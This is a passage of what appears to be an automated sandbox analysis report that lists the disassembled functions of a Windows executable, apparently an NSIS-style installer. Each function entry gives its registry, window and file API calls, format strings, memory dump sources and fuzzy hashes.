                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                  • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                  • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                  • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                  • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                  • String ID: !
                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                  • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                  • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                  • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                  • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  Strings
                                                                                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                  • API String ID: 1697273262-1764544995
                                                                                                                                                  • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                  • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                  • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                  • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                  Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                  • String ID: $@rD
                                                                                                                                                  • API String ID: 3748168415-881980237
                                                                                                                                                  • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                  • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                  • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                  • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                  • API String ID: 2577523808-3778932970
                                                                                                                                                  • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                  • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                  • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                  • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                  Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcatwsprintf
                                                                                                                                                  • String ID: %02x%c$...
                                                                                                                                                  • API String ID: 3065427908-1057055748
                                                                                                                                                  • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                  • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                  • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                  • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                  Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                  • API String ID: 2266616436-4211696005
                                                                                                                                                  • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                  • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                  • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                  • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1599320355-0
                                                                                                                                                  • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                                  • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                  • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                                  • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                  Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                  • String ID: Version
                                                                                                                                                  • API String ID: 512980652-315105994
                                                                                                                                                  • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                  • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
